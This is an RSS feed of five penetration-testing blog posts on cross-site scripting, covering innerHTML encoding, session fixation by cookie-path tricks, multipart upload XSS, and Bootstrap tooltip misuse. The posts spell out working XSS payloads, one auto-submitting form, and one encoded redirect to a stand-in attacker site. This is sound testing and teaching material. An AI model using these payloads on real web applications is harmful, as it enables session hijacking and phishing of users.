<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Explore Security &#187; xss</title>
	<atom:link href="http://www.exploresecurity.com/tag/xss/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.exploresecurity.com</link>
	<description>IT security tools, techniques and commentary</description>
	<lastBuildDate>Wed, 15 Jun 2022 09:21:02 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.6.1</generator>
		<item>
		<title>Missing XSS flaws with innerHTML and jQuery</title>
		<link>http://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/</link>
		<comments>http://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/#comments</comments>
		<pubDate>Wed, 28 Mar 2018 15:11:42 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[jQuery]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=440</guid>
		<description><![CDATA[I thought a couple of gotchas when testing for XSS could be a useful post. Not new, especially, but I haven&#8217;t posted for a while. It shows how you might think you&#8217;ve covered an area of a web application and declared it free from XSS but in fact there might be a bug left behind. [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>I thought a couple of gotchas when testing for XSS could be a useful post. Not new, especially, but I haven&#8217;t posted for a while. It shows how you might think you&#8217;ve covered an area of a web application and declared it free from XSS but in fact there might be a bug left behind.<span id="more-440"></span></p>
<p>These days a typical web app pulls in data from background XHR requests, the responses come back in a data format like JSON, and the data is parsed client-side and inserted into the DOM of the page. This means, of course, that the encoding of the data in the response is not sufficient by itself to know whether there’s a potential XSS risk – it depends how the data is finally encoded when inserted into the page. But consider the following:</p>
<ol>
<li>You enter <code>&lt;script&gt;alert(1)&lt;/script&gt;</code> hoping for a quick and dirty win – nothing</li>
<li>You suspect input validation so you enter something that you hope will pass validation but test encoding, e.g. <code>xss &lt; &gt; test</code></li>
<li>You inspect the page using the browser dev tools and see it has been inserted as <code>xss &amp;lt; &amp;gt; test</code></li>
<li>So the encoding looks good, and you move on&#8230;</li>
</ol>
<p>But wait! Even dangerous DOM manipulation can perform encoding in a text context. For example, <code>innerHTML</code> will observe the <a href="https://w3c.github.io/DOM-Parsing/#xml-serializing-a-text-node">rules</a> and, in a text context, will encode <code>&lt;</code> as <code>&amp;lt;</code> and <code>&gt;</code> as <code>&amp;gt;</code> (and <code>&amp;</code> as <code>&amp;amp;</code> in fact), otherwise those characters are inserted/parsed literally. So the encoding seen in step 3 could be explained by this, meaning that the potential for XSS still exists. It’s precisely because jQuery uses <code>innerHTML</code> as part of functions like <a href="http://api.jquery.com/append/"><em>append()</em></a> that the documentation is full of caveats about not using data from &#8220;untrusted sources&#8221;.</p>
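<p>As a rough illustration (plain Node, no DOM; <code>serializeText</code> is a hypothetical helper that mimics the text-node serialization rules linked above, not a browser API):</p>

```javascript
// Sketch of the text-node serialization rules: when a text node is
// read back as markup (e.g. in dev tools or via reading innerHTML),
// &, < and > are shown encoded -- so "encoded" output alone doesn't
// tell you how the data was inserted.
function serializeText(text) {
  return text
    .replace(/&/g, '&amp;')   // & first, to avoid double-encoding
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Whether the app inserted the data safely as text, or unsafely via
// innerHTML in a text context, the inspector shows the same thing:
console.log(serializeText('xss < > test')); // xss &lt; &gt; test
```

<p>In other words, the encoding seen in step 3 is exactly what you would see for both a safe and an unsafe insertion path.</p>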
<p>Let’s assume the developers haven’t thought about XSS at all. So why did step 1 fail? This is because the <a href="https://www.w3.org/TR/2008/WD-html5-20080610/dom.html#innerhtml0">spec</a> says &#8220;script elements inserted using <code>innerHTML</code> do not execute when they are inserted&#8221;. If the first test case had been <code>&lt;img src=x onerror=alert(1)&gt;</code> the XSS would have been revealed in step 1.</p>
<p>Hope that’s of some use!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/missing-xss-flaws-with-innerhtml-and-jquery/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>When HTML Encoding Helped XSS</title>
		<link>http://www.exploresecurity.com/when-html-encoding-helped-xss/</link>
		<comments>http://www.exploresecurity.com/when-html-encoding-helped-xss/#comments</comments>
		<pubDate>Fri, 30 Jan 2015 10:19:17 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[session fixation]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=342</guid>
		<description><![CDATA[Recently I was pentesting a web app that had an unauthenticated XSS vulnerability but there was some heavy filtering in place. Nonetheless I was able to achieve session fixation using a combination of a technique I previously explained and some fun filter workarounds &#8211; including using the application&#8217;s own defensive HTML encoding to create a [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Recently I was pentesting a web app that had an unauthenticated XSS vulnerability but there was some heavy filtering in place. Nonetheless I was able to achieve session fixation using a combination of a technique I <a href="http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/">previously explained</a> and some fun filter workarounds &#8211; including using the application&#8217;s own defensive HTML encoding to create a working XSS payload!<span id="more-342"></span></p>
<h3>The problem</h3>
<p>The application used a bespoke session management cookie. I&#8217;ll call it MYSESSIONID. On login, it wasn&#8217;t renewed. I couldn&#8217;t push a session cookie onto the victim in a classic session fixation attack. However, I had XSS in an unauthenticated page &#8211; but not the login page. The filtering in place used a combination of removal and encoding. Characters that were stripped out included:</p>
<p><code>+ ; ( ) ? &lt; &gt;</code></p>
<p>Characters that were allowed included:</p>
<p><code>" ' = [ ] / , .</code></p>
<p>So even though MYSESSIONID wasn&#8217;t protected with the <em>HttpOnly</em> flag, I just couldn&#8217;t construct a payload to steal it. Instead I looked to set one of my own. Here&#8217;s a breakdown of the attack:</p>
<h3>1. Get a valid cookie</h3>
<p>The application did not accept arbitrary session management cookies so the attacker sends a request to get a valid one. In this case, simply having no MYSESSIONID wasn&#8217;t enough, the cookie had to be present but an invalid value did the trick:</p>
<p><code>Cookie: MYSESSIONID=aaaaaaaaaaaaaaaaaaa:xx01</code></p>
<p>returned</p>
<p><code>Set-Cookie: MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01; Path=/; Domain=.example.com</code></p>
<h3>2. The XSS</h3>
<p>The malicious link looked something like this (the highlighted bits are explained below):</p>
<p><code>https://www.example.com/app/folder/page?vuln=foo"<span style="color: red;">%0a</span>document.cookie%3d"MYSESSIONID%3dNDnQrZ6JsMHyJTBCw8n:xx01<span style="color: blue;">:%0d</span><span style="color: red;">path%3d/app/</span></code></p>
<p>When clicked, the XSS flaw wrote the following to the return page inside a JavaScript code block:</p>
<p><code>var a = "foo"<br />
document.cookie="MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13;path=/app/";</code></p>
<p>The <span style="color: red;">%0a</span> at the front of the XSS payload was used to start a new line, and this was sufficient to act as a statement terminator after <code>var a = "foo"</code> (semi-colons were being stripped). But in order to inject a <code>path</code> attribute (discussed below) I did need a semi-colon in the cookie string. By running every character through a Burp Intruder attack, I saw which characters were allowed, which were stripped and which were returned encoded. By inserting <span style="color: blue;">:%0d</span> into the XSS payload, :&amp;#13; was returned &#8211; yes, %0d was encoded but %0a (used above) came back fine! Being inside a string inside a JavaScript block, &amp;#13; wasn&#8217;t seen as an HTML entity by the browser and thus wasn&#8217;t interpreted. This provided the semi-colon needed to create a <code>path</code> attribute.</p>
<p>The colon at the front was used because it looked like the session cookie was delimited in that way. That &#8220;xx01&#8221; might refer, for example, to an internal server for load-balancing. Anyway, whatever it did, the application tolerated the unusual suffix to the session cookie. So that explains the :%0d appended to the cookie value in the XSS payload. Now for the <code><span style="color: red;">path%3d/app/</span></code>&#8230;</p>
<h3>3. The victim logs in</h3>
<p>So, at this point, the attacker has set the MYSESSIONID cookie on the victim to be <code>NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13</code> via a reflected XSS attack. Now the victim goes to the login page at https://www.example.com/app/login or is bounced there by navigating to a part of the site that enforces authentication. At login two MYSESSIONID cookies are passed up. This is because one had been set earlier in a <code>Set-Cookie</code> response header the first time the victim hit the site, even if that was by visiting the XSS&#8217;ed page. The genuine MYSESSIONID has a <code>path</code> of / and a <code>domain</code> of .example.com. If I had set a cookie by XSS with no attributes my cookie would have had a <code>path</code> of /app/folder/ (to match the path of the page which set the cookie) and a <code>domain</code> of www.example.com (to match the domain of said page). This would mean my cookie would never be sent up to /app/login for authentication, hence the need to set a <code>path</code> as part of the XSS.</p>
<p>Furthermore, when two MYSESSIONID values were sent up, the application took the first value so I had to make sure my cookie was first. By setting a <code>path</code> of /app/, it trumped the real MYSESSIONID for having a better path match to /app/login. Thus it was listed first in the POST request with the credentials and became authenticated:</p>
<p><code>Cookie: MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13; MYSESSIONID=4GRc4jiKNeQIfsqh2:xx01</code></p>
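<p>The ordering rule at work can be sketched like this (a simplified model of the browser's Cookie-header serialization order, where cookies with longer matching paths are listed first; not real browser code):</p>

```javascript
// Simplified model: when building the Cookie header, browsers list
// cookies with longer (more specific) matching paths first.
function cookieHeader(cookies, requestPath) {
  return cookies
    .filter(c => requestPath.startsWith(c.path))    // crude path-match
    .sort((a, b) => b.path.length - a.path.length)  // longest path first
    .map(c => `${c.name}=${c.value}`)
    .join('; ');
}

const jar = [
  { name: 'MYSESSIONID', value: 'serverCookie',   path: '/' },
  { name: 'MYSESSIONID', value: 'attackerCookie', path: '/app/' },
];

// For /app/login the attacker's /app/ cookie wins the sort, and the
// application, taking the first value, authenticates it.
console.log(cookieHeader(jar, '/app/login'));
// MYSESSIONID=attackerCookie; MYSESSIONID=serverCookie
```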
<p>In contrast, the <code>domain</code> of a cookie does not govern precedence in a standardised way; it varies between browsers. From memory I think my cookie (with a more specific domain match) was sent up first by IE but second by Chrome and Firefox. It&#8217;s not something you want to rely on. Neither could I overwrite the cookie, because for that to happen the name, path and domain must match. That would mean having to change both attributes from their defaults but in this case I could only change one. This is because I&#8217;d need a second semi-colon to set a second attribute and in doing so, using the encoding trick above, the first attribute would be spoilt, e.g. I&#8217;d get</p>
<p><code>var a = "foo"<br />
document.cookie="MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13;path=/app/<span style="color: red;">&amp;#13</span>;domain=.example.com";</code></p>
<p>Developing this proof-of-concept for this specific injection point was quite fiddly and took some persistence but it was worth it. For all of their filtering &#8211; and because they did not change the session cookie after authentication &#8211; this was a nice practical attack using an unauthenticated XSS. One take-away thought then: be sure to probe the XSS defences in full because you never know what might come back and how it could be of help!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/when-html-encoding-helped-xss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Session Fixation and XSS Working Hand-in-Hand</title>
		<link>http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/</link>
		<comments>http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/#comments</comments>
		<pubDate>Sat, 06 Sep 2014 22:05:41 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[Cookies]]></category>
		<category><![CDATA[session fixation]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=212</guid>
		<description><![CDATA[Often a combination of security flaws come together to produce a unique attack vector. Individually the flaws may not amount to much but together they make an interesting combo. This is invariably more interesting from a pentesting point of view because you know that a tool couldn&#8217;t positively find it. Session fixation is one such [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Often a combination of security flaws come together to produce a unique attack vector. Individually the flaws may not amount to much but together they make an interesting combo. This is invariably more interesting from a pentesting point of view because you know that a tool couldn&#8217;t positively find it. Session fixation is one such scenario because usually a few requirements must be met for the attack to work. I thought I&#8217;d write up a recent session fixation flaw because the act of forcing the cookie onto the victim involved a little twist on overwriting session cookies that made a reflective XSS attack last a lot longer while also laughing in the face of <code>httponly</code>.<span id="more-212"></span></p>
<p>As long as an attacker can remotely force the victim to use a known session cookie that becomes authenticated, you&#8217;ve found session fixation, but it&#8217;s one of those flaws that can be achieved in multiple ways that are subtly different from one another. In this particular instance the session fixation attack ran like this:</p>
<h3>1. The attacker makes up a session cookie</h3>
<p>Yes, the application accepted client-generated cookies.</p>
<h3>2. The attacker makes a specific request using the fabricated cookie</h3>
<p>This was a bit odd but if the session cookie from a request was not recognised by the application (whether it was made up or, more usually, it had just been set by the previous response page) then a background XHR request was made that effectively &#8220;authorised&#8221; the cookie. Okay, whatever, so the attacker does this.</p>
<h3>3. The login page suffers from XSS so the attacker crafts a malicious link to set the known cookie on the victim</h3>
<p>The malicious link was something like this (I&#8217;ve removed the URL-encoding to make it easier to read):</p>
<p style="padding-left: 30px;"><code>https://www.example.com/login?param="&gt;&lt;script&gt;document.cookie="PHPSESSID=attackerCookie; path=/login; expires=Tue, 06-Aug-2024 00:00:01 GMT"&lt;/script&gt;</code></p>
<p>In more &#8220;traditional&#8221; session fixation the attacker&#8217;s cookie is a parameter in the request that the attacker tricks the victim into making, so using XSS seems a bit like cheating. Unfortunately (for me) the application didn&#8217;t accept a session cookie in the &#8220;traditional&#8221; way and XSS was my only option. OWASP does credit XSS in its description of <a href="https://www.owasp.org/index.php/Session_fixation">session fixation</a> but, that aside, not only did XSS help the session fixation attack but the session fixation flaw helped the XSS attack&#8230;One reason for this was that a simple <code>document.cookie</code> session hijack through XSS was restricted by the response to the above request:</p>
<p style="padding-left: 30px;"><code>Set-Cookie: PHPSESSID=serverCookie; path=/; secure; HttpOnly</code></p>
<p>Because of the <code>httponly</code> flag, the XSS payload could not pull out the session cookie and send it to the attacker. Of course, many other interesting XSS options are still possible, such as rewriting the form&#8217;s <code>action</code> attribute so that the login credentials would be sent to the attacker. However, one advantage of the session fixation approach (apart from the interest of seeing it working) is that <em>nothing</em> is sent to the attacker. Furthermore, as I&#8217;ll explain later (and you may have already spotted from the XSS payload) this attack has the potential to be more long-term than knowing the username and password.</p>
<p>The <code>httponly</code> flag has another effect: the XSS payload can neither read the cookie nor overwrite it. This behaviour isn&#8217;t standardised; it&#8217;s one of those grey areas that Michal Zalewski covers <a href="https://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_cookies">so</a> <a href="http://lcamtuf.coredump.cx/tangled/">well</a> but in this case it&#8217;s not so grey. IE 10, Chrome 37 and Firefox 30 all behaved in the same way. But you might have noticed that the XSS payload included a <code>path</code> of /login when it set the session cookie. This is where the attacker wins, as now the browser doesn&#8217;t see this as an overwrite but as a different cookie altogether&#8230;</p>
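<p>The &#8220;different cookie altogether&#8221; behaviour can be sketched with a toy cookie jar (a simplified model, not real browser internals): a write only replaces an existing cookie when name, path and domain all match.</p>

```javascript
// Toy cookie jar: a write replaces an existing entry only if name,
// path AND domain all match; otherwise it creates a separate cookie
// (simplified model of browser behaviour).
function setCookie(jar, cookie) {
  const i = jar.findIndex(c =>
    c.name === cookie.name && c.path === cookie.path && c.domain === cookie.domain);
  if (i >= 0) jar[i] = cookie; else jar.push(cookie);
  return jar;
}

const jar = [];
// The server sets its cookie with path=/ (and HttpOnly, which the
// XSS payload can't read -- but it doesn't need to):
setCookie(jar, { name: 'PHPSESSID', value: 'serverCookie', path: '/', domain: 'www.example.com' });
// The XSS payload sets the same name with path=/login:
setCookie(jar, { name: 'PHPSESSID', value: 'attackerCookie', path: '/login', domain: 'www.example.com' });

console.log(jar.length); // 2 -- not an overwrite: two distinct cookies
```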
<h3>4. The victim logs in and the session cookie becomes authenticated</h3>
<p>The server-generated session cookie included a <code>path=/</code> directive so when the victim logs in to /login the attacker&#8217;s cookie has precedence (in that it&#8217;s listed first) because the path is a more specific match to the target page:</p>
<p style="padding-left: 30px;"><code>Cookie: PHPSESSID=attackerCookie; PHPSESSID=serverCookie</code></p>
<p>The application processed the first cookie with the login, thus the attacker&#8217;s fabricated cookie became authenticated and was associated with the victim&#8217;s account. Of course if the session cookie had been changed after authentication, which is best practice, the attack would have failed. Note that the attacker can also set the <code>domain</code> attribute of the cookie to .example.com to try to widen the impact of the attack.</p>
<h3>5. The attacker uses the known session cookie to masquerade as the victim</h3>
<p>The last thing to mention is the long-term nature of this attack. Although logging off did detach the session cookie from the victim&#8217;s account, leaving it unauthenticated, the application did not clear it (again, best practice). So the next time the website is visited, the attacker&#8217;s session cookie will again be offered, accepted and authenticated. Because the XSS payload effectively makes the cookie permanent by setting a long expiry date, the attacker has access to the account of anyone that logs in using the compromised browser in the future. Of course, the persistence of the attack dies as soon as the browser&#8217;s cookie cache is cleared &#8211; but how often does that happen? For what is, after all, a <em>reflected</em> XSS attack, you&#8217;d be certain to get a good return. Indeed, if the browser is shared among users (e.g. at home or at internet kiosks), a single XSS attack can exploit multiple users of the website, making it a one-to-many attack, which you don&#8217;t tend to associate with reflective XSS.</p>
<p>I&#8217;m not claiming any of this is particularly novel, by the way. I just enjoyed finding the XSS path trick for myself and using it with session fixation to poke fun at <code>httponly</code> and to create a more persistent version of a reflective XSS attack. It also demonstrated that best practice points, although seemingly trivial when taken alone, can help to stop or mitigate more complex attacks.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A Tricky Case of XSS</title>
		<link>http://www.exploresecurity.com/a-tricky-case-of-xss/</link>
		<comments>http://www.exploresecurity.com/a-tricky-case-of-xss/#comments</comments>
		<pubDate>Thu, 10 Apr 2014 20:55:52 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=169</guid>
		<description><![CDATA[On a recent test I came across a reflective XSS condition within a file upload page. When the extension was deemed invalid by the application, it was returned unsanitised within the error message. Not only did this turn out to be an exercise in exploiting reflective XSS in multipart/form-data but there were some pretty hefty [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>On a recent test I came across a reflective XSS condition within a file upload page. When the extension was deemed invalid by the application, it was returned unsanitised within the error message. Not only did this turn out to be an exercise in exploiting reflective XSS in multipart/form-data but there were some pretty hefty restrictions on allowed characters too. Worthy of a post I thought.<span id="more-169"></span></p>
<h2>XSS in multipart/form-data</h2>
<p>An example of a malicious payload contained something like:</p>
<p><code>Content-Disposition: form-data; name="file"; filename="test.&lt;img src=a onerror=alert(1)&gt;"</code></p>
<p>This produced a response that included:</p>
<p><code>File Upload failed: "File extension '&lt;img src=a onerror=alert(1)&gt;'</code></p>
<p>Of course, normally reflective XSS in POST is exploited by a form that auto-submits through JavaScript. But this one was a bit trickier &#8211; how can you replicate the multipart/form-data structure? When you begin to experiment with this you soon find some difficulties &#8211; for example, submitting a filename when no file was actually chosen by the victim user. An XHR call could compose the request but then you run into the Same Origin Policy. In this case there was no wide-open CORS policy to allow me to process the response from the request. Besides which, this wouldn&#8217;t allow me to run script in the context of the target domain in the usual way of XSS; it would merely give me access to the response, which restricts the impact.</p>
<p>I finally found a big hint courtesy of a CSRF article <a href="http://kuza55.blogspot.co.uk/2008/02/csrf-ing-file-upload-fields.html">here</a>. My proof of concept payload was as follows:</p>
<p><code>&lt;form name="xss" method="post" action="http://domain.site/upload.page" enctype="multipart/form-data"&gt;<br />
&lt;textarea name='file"; filename="test.&lt;img src=a onerror=alert(1)&gt;'&gt;<br />
File Contents Didn't Matter Here<br />
&lt;/textarea&gt;<br />
&lt;input name="action" value="fileupload"/&gt;<br />
&lt;input type="submit" name="" value="" size="0" /&gt;<br />
&lt;/form&gt;<br />
&lt;script&gt;document.xss.submit();&lt;/script&gt;</code></p>
<p>This produced the following POST body:</p>
<p><code>-----------------------------7de21b3079c<br />
Content-Disposition: form-data; name="file"; filename="test.&lt;img src=a onerror=alert(1)&gt;"</code></p>
<p><code>File Contents Didn't Matter Here</code><br />
<code>-----------------------------7de21b3079c</code><br />
<code>Content-Disposition: form-data; name="action"</code></p>
<p><code>fileupload<br />
-----------------------------7de21b3079c--</code></p>
<p>Note how the filename attribute of the request is sneaked in by means of the form&#8217;s textarea name. The request is missing the normal multipart/form-data Content-Type header but I didn’t need it so I didn&#8217;t pursue that any further.</p>
<p>And now for the caveats! I tried this on Chrome, Firefox and IE10 and it only worked on IE &#8211; the other two added escape characters that broke the payload. Also, you may be thinking &#8220;why the img onerror? Why not good old &lt;script&gt;&#8230;&lt;/script&gt;?&#8221; The / character caused issues &#8211; presumably because it was interpreted as a delimiter for directories (remember, this is a file upload page). The \ character posed similar issues. And so did &#8216; for obvious reasons &#8211; it terminates the textarea name value too early. A &#8221; was fine so long as it was injected as \&#8221;. Finally a . was treated as an extension delimiter so everything to the left of the right-most . was lost in the response (because the error returned the extension, not the full filename). So what does all that mean for a more interesting payload?</p>
<h2>alert(1) is lame</h2>
<p>I always try to put something of value in a XSS payload and alert(1) shows nothing. Even alert(document.cookie) proves that JavaScript can access session cookies when they&#8217;re not HttpOnly. But with / \ &#8216; and . being consumed by the page, what could I do? I got into an email conversation with two NCC colleagues, Gareth and Soroush (<a href="https://twitter.com/irsdl">@irsdl</a>), and after some to-ing and fro-ing they came up with:</p>
<p><code>&lt;textarea name='file"; filename="test.&lt;img src=a onerror=document&amp;amp;#46;location&amp;amp;#61;&amp;amp;#34;http:&amp;amp;#47;&amp;amp;#47;evil&amp;amp;#46;site&amp;amp;#34;&gt;'&gt;</code></p>
<p>The browser decodes this once (&amp;amp; becomes &amp;) to send:</p>
<p><code>Content-Disposition: form-data; name="file"; filename="test.&lt;img src=a onerror=document&amp;#46;location&amp;#61;&amp;#34;http:&amp;#47;&amp;#47;evil&amp;#46;site&amp;#34;&gt;"</code></p>
<p>Back comes the HTTP response with:</p>
<p><code>&lt;img src=a onerror=document&amp;#46;location&amp;#61;&amp;#34;http:&amp;#47;&amp;#47;evil&amp;#46;site&amp;#34;&gt;</code></p>
<p>Which decodes to:</p>
<p><code>&lt;img src=a onerror=document.location="http://evil.site"&gt;</code></p>
<p>And this of course redirects the browser immediately to evil.site, where some kind of exploitation or phishing could be undertaken. Job done.</p>
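<p>The two decoding steps can be sketched with a minimal numeric-entity decoder (illustrative only; real HTML entity handling is more involved):</p>

```javascript
// Minimal decoder for the two entity forms this payload relies on:
// numeric character references (&#NN;) and &amp;.
function decodeOnce(s) {
  return s
    .replace(/&#(\d+);/g, (_, n) => String.fromCharCode(Number(n)))
    .replace(/&amp;/g, '&');
}

const attr = 'document&amp;#46;location&amp;#61;&amp;#34;' +
             'http:&amp;#47;&amp;#47;evil&amp;#46;site&amp;#34;';

// 1st decode: the browser parsing the form's textarea name attribute
const sent = decodeOnce(attr);
console.log(sent);
// document&#46;location&#61;&#34;http:&#47;&#47;evil&#46;site&#34;

// 2nd decode: the browser parsing the reflected response
console.log(decodeOnce(sent));
// document.location="http://evil.site"
```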
<p>This was one of the trickiest XSS injections I have come across. Hopefully you found something new here and you can add a couple of new XSS payloads to your arsenal.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/a-tricky-case-of-xss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>DOM XSS by Misusing Bootstrap</title>
		<link>http://www.exploresecurity.com/dom-xss-by-misusing-bootstrap/</link>
		<comments>http://www.exploresecurity.com/dom-xss-by-misusing-bootstrap/#comments</comments>
		<pubDate>Sun, 02 Mar 2014 23:18:58 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[bootstrap]]></category>
		<category><![CDATA[dom-xss]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=159</guid>
		<description><![CDATA[First of all, let me make it clear that this article is not about XSS in Bootstrap itself (the very popular libraries originally from Twitter to fancify your website), it&#8217;s about XSS as a result of using Bootstrap in an insecure fashion. It&#8217;s based on a real penetration test &#8211; the site in question wasn&#8217;t [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>First of all, let me make it clear that this article is <em>not</em> about XSS in Bootstrap itself (the very popular libraries originally from Twitter to fancify your website), it&#8217;s about XSS as a result of using Bootstrap in an insecure fashion. It&#8217;s based on a real penetration test &#8211; the site in question wasn&#8217;t vulnerable but it was immediately clear how things could have gone wrong. I thought it would be an interesting XSS article, being both DOM-based and making use of a big-name library like Bootstrap.<span id="more-159"></span></p>
<p>To illustrate the point I&#8217;ve written a vulnerable page. <em>What, it&#8217;s vulnerable to XSS?</em> Yes. <em>Do you know what you&#8217;re doing?</em> I hope so. Here&#8217;s the brief:</p>
<ul>
<li>Try to create a DOM-based XSS condition that runs <code>&lt;script&gt;alert(1)&lt;/script&gt;.</code></li>
<li>Don&#8217;t bother trying to inject any other kind of script &#8211; it won&#8217;t work and the result may throw you. If it does work, I run a white-hat vulnerability programme &#8211; sorry, no bounty, just my thanks and a credit on the page <img src='http://www.exploresecurity.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </li>
<li>Getting the alert box to pop up shouldn&#8217;t be hard at all &#8211; what&#8217;s more interesting is to spot the Bootstrap implementation error. When you view the source, note the comment on line 22 to ignore the indented lines (23-26 and 28) &#8211; that&#8217;s the code that should be protecting the page from arbitrary XSS.</li>
<li>The page is <a title="Bootstrap DOM XSS" href="http://exploresecurity.com/wp-content/uploads/custom/bootstrap-dom-xss.html" target="_blank">here</a>.</li>
</ul>
<h2>Discussion</h2>
<p>I&#8217;m assuming you&#8217;ve had a look at the page above. The Bootstrap JavaScript plugin allows you to use &#8220;tooltips&#8221; (information shown on mouseover) that write into the DOM. Because of this, you can create more advanced tooltips by writing HTML code into the DOM. This is when the alarm bells should sound. In my page the email address, when invalid, is coloured red. But because the email address is under user control and can be pre-populated in the query string, there&#8217;s a DOM-based XSS condition, e.g. <a title="Solution" href="http://exploresecurity.com/wp-content/uploads/custom/bootstrap-dom-xss.html?email=&lt;script&gt;alert(1)&lt;/script&gt;" target="_blank">http://exploresecurity.com/wp-content/uploads/custom/bootstrap-dom-xss.html?email=&lt;script&gt;alert(1)&lt;/script&gt;</a>, which will fire when the victim hovers over the email address.</p>
<p>To get HTML inserted by a tooltip you need to set the attribute <code>data-html="true"</code>. The default is false, which means the content is encoded before insertion into the page. But if you want to add some markup, such as changing the colour, you&#8217;ll need to set it to true. In this case if any part of the content is user-supplied, it needs to be handled safely.</p>
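<p>The decision the plugin makes can be sketched as follows (a simplified model of the tooltip content handling, not Bootstrap&#8217;s actual source):</p>

```javascript
// Simplified model of tooltip rendering: with data-html="false" the
// title is encoded as text; with data-html="true" it is inserted raw,
// so any user-controlled portion becomes an XSS sink.
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function renderTooltip(title, htmlAllowed) {
  return htmlAllowed ? title : escapeHtml(title);
}

const userInput = '<script>alert(1)</script>';
console.log(renderTooltip(userInput, false));
// &lt;script&gt;alert(1)&lt;/script&gt;  -- harmless text
console.log(renderTooltip(userInput, true));
// <script>alert(1)</script>  -- parsed as markup: unsafe
```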
<p>The XSS risk is clearly stated in the <a href="http://getbootstrap.com/javascript/#tooltips-usage" target="_blank">documentation</a> but that doesn&#8217;t mean mistakes won&#8217;t be made. In the test that prompted this article, the <code>data-html</code> attribute was set to true everywhere, even when the content being displayed was straight text. Of course, no harm in that case &#8211; but in a few places the content was dynamic. Sadly (for me) this content was not under user control.</p>
<h2>Conclusion</h2>
<p>Developers and penetration testers may assume that popular and big-name libraries like Bootstrap (especially the latest version) are safe but this article shows that it depends on how they&#8217;re being used. As a penetration tester, watch out for client-side code that modifies the page and research the (potentially) dangerous options in popular third-party libraries (look out for that <code>data-html</code> attribute!). As a developer, it&#8217;s all about (as ever) handling user-supplied content safely &#8211; and this article emphasises that you can&#8217;t always rely on third-party libraries to do everything for you. With great power comes great responsibility.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/dom-xss-by-misusing-bootstrap/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
